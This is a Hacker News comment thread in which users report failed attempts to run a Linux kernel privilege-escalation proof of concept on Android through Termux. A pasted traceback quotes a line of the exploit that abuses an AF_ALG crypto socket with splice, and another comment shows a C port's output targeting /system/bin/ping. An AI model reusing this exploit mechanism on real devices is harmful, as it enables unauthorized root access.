Comment by int0x29

19 hours ago

Now the socket is blocked. Also probably should have realized the socket is defined earlier than its called

Traceback (most recent call last): File "/data/data/com.termux/files/home/exploit.py", line 9, in <module> while i<len(e):c(f,i,e[i:i+4]);i+=4 ^^^^^^^^^^^^^^^ File "/data/data/com.termux/files/home/exploit.py", line 5, in c a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"4+c],[(h,3,i4),(h,2,b'\x10'+i19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o) ^^^^^^^^^^^^^^^^ File "/data/data/com.termux/files/usr/lib/python3.12/socket.py", line 233, in __init__ _socket.socket.__init__(self, family, type, proto, fileno) PermissionError: [Errno 13] Permission denied

3 comments

int0x29

fragmede 16 hours ago

PoC is also x86_64 only and not arm.

tgies 14 hours ago
fixed: https://github.com/tgies/copy-fail-c
- notpushkin 6 hours ago
  
  Thanks! Will give it a try a bit later.
  (HN algorithms have killed some of your comments, perhaps because you posted the same URL too many times from a relatively new account? I’ve vouched for you, but keep in mind that it triggers antispam.)
  ---
  Edit: naturally, no luck:
  $ ./exploit /system/bin/ping [+] target: /system/bin/ping [+] payload: 2112 bytes (528 iterations) socket(AF_ALG): Permission denied patch_chunk failed at offset 0
  Guess AF_ALG is just disabled on Android kernel builds. Though maybe it’ll work on other devices!